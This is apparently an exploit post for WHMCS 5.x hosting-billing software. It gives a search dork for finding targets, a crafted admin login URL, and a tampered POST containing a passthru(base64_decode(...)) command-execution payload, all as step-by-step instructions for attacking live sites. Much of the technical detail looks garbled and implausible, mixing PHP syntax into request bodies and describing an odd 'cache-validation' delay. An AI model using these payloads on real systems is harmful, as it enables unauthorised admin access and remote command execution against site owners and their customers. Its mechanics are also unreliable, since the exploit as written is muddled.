WHMCS 5.x Authentication Bypass

`WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can be easily bypassed.  
  
##################################################  
# Description : WHMCS 5.x Authentication Bypass Vulnerability  
# Author : Agd_Scorp  
# Contact: [email protected]  
# Version : 5.x  
# Link : http://www.whmcs.com/order-now/  
# Date : Monday, December 31, 2012  
# Dork : intext:Powered by WHMCompleteSolution  
##################################################  
  
Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.  
  
# The Fact:  
  
WHMCS  
5.0 is completely vulnerable to this vulenrability, but in 5.1 version,  
WHMCS has added extra cache-security, so I've added an extra-payload   
for it, you can do the exploitation-process without the payload in the   
5.0 version.  
  
  
# The Exploitation  
  
http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}  
  
after  
you have successfully entered that into your browser, the page will lag  
for abit due to the cache-validation, which we, ofcourse, will change   
it. ;-)  
  
  
when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this:  
  
POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";  
  
Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}";  
  
  
# The Result  
  
Once  
you have done this process, you will be automatically be redirected to   
the admin page, although, if the administrator has enabled   
cache-security, this process will fail.  
  
# Solution & Fix  
  
No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.  
  
`